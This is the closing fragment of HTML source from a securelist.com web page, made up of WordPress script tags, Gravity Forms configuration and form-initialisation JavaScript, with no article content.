{"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","loading":"Loading...","marketoBaseURL":"","marketoVirtualForm":"27241","munchkinID":"802-IJN-240","reCaptcha_key":"6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js,wp-content/plugins/kaspersky-gravity-forms-dynamic-recaptcha/assets/js/main.js,wp-content/plugins/kaspersky-lazy-load/assets/js/main.js,wp-content/plugins/kaspersky-omniture/assets/dataLayer.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/migrate.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/autocomplete.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/ajax-script.js,wp-content/plugins/wds-no-login-autocomplete/js/script.js,wp-content/themes/securelist2020/assets/js/main.js,wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/akismet/_inc/akismet-frontend.js,wp-includes/js/dist/dom-ready.min.js,wp-includes/js/dist/hooks.min.js,wp-includes/js/dist/i18n.min.js,wp-includes/js/dist/a11y.min.js'></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.5.16.3" id="gform_json-js"></script> <script type="text/javascript" id="gform_gravityforms-js-extra"> /* <![CDATA[ */ var gform_i18n = {"datepicker":{"days":{"monday":"Mon","tuesday":"Tue","wednesday":"Wed","thursday":"Thu","friday":"Fri","saturday":"Sat","sunday":"Sun"},"months":{"january":"January","february":"February","march":"March","april":"April","may":"May","june":"June","july":"July","august":"August","september":"September","october":"October","november":"November","december":"December"},"firstDay":1,"iconText":"Select date"}}; var gf_global = {"gf_currency_config":{"name":"U.S. 
Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. 
The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; /* ]]> */ </script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.5.16.3" id="gform_gravityforms-js"></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.5.16.3" id="gform_placeholder-js"></script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).on('gform_post_render', function(event, formId, currentPage){if(formId == 11) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ) } ); /* ]]> */ </script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).trigger('gform_post_render', [11, 1]) } ); /* ]]> */ </script> </body> </html>